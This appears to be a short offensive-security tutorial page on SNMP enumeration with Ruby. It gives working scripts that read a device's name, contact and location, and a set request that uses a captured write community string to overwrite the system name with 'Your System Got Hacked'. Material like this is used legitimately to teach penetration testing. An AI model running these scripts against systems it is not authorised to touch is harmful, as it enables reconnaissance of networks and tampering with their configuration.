SNMP Enumeration

  • Install ruby-snmp
    1. gem install snmp

Get Request

Miss configure an SNMP service would gives an attacker a huge mount of information. Let’s to see you we can interact with the server to retrieve some info.

  1. # KING SABRI | @KINGSABRI
  2. require 'snmp'
  4. # Connect to SNMP server
  5. manager = SNMP::Manager.new(:host => '192.168.0.17')
  7. # General info
  8. puts "SNMP Version: " + manager.config[:version]
  9. puts "Community: " + manager.config[:community]
  10. puts "Write Community: " + manager.config[:WriteCommunity]
  13. # Get hostname, contact and location
  14. hostname = manager.get("sysName.0").each_varbind.map {|vb| vb.value.to_s}       # manager.get("sysName.0").varbind_list[0]
  15. contact  = manager.get("sysContact.0").each_varbind.map {|vb| vb.value.to_s}    # manager.get("sysContact.0").varbind_list[0]
  16. location = manager.get("sysLocation.0").each_varbind.map {|vb| vb.value.to_s}   # manager.get("sysLocation.0").varbind_list[0]
  18. # It would take an array of OIDs
  19. response = manager.get(["sysName.0", "sysContact.0", "sysLocation.0"])
  20. response.each_varbind do |vb|
  21.     puts vb.value.to_s
  22. end

Note: the OID names are case sensitive

Set Request

Sometimes we get luck and we get the private/management string of SNMP. At this moment we might be able to apply changes on the system, router, switches configurations.

  1. require 'snmp'
  2. include SNMP
  4. # Connect to SNMP server
  5. manager = SNMP::Manager.new(:host => '192.168.0.17')
  6. # Config our request to OID
  7. varbind = VarBind.new("1.3.6.1.2.1.1.5.0", OctetString.new("Your System Got Hacked"))
  8. # Send your request with varbind our settings
  9. manager.set(varbind)
  10. # Check our changes
  11. manager.get("sysName.0").each_varbind.map {|vb| vb.value.to_s}
  12. manager.close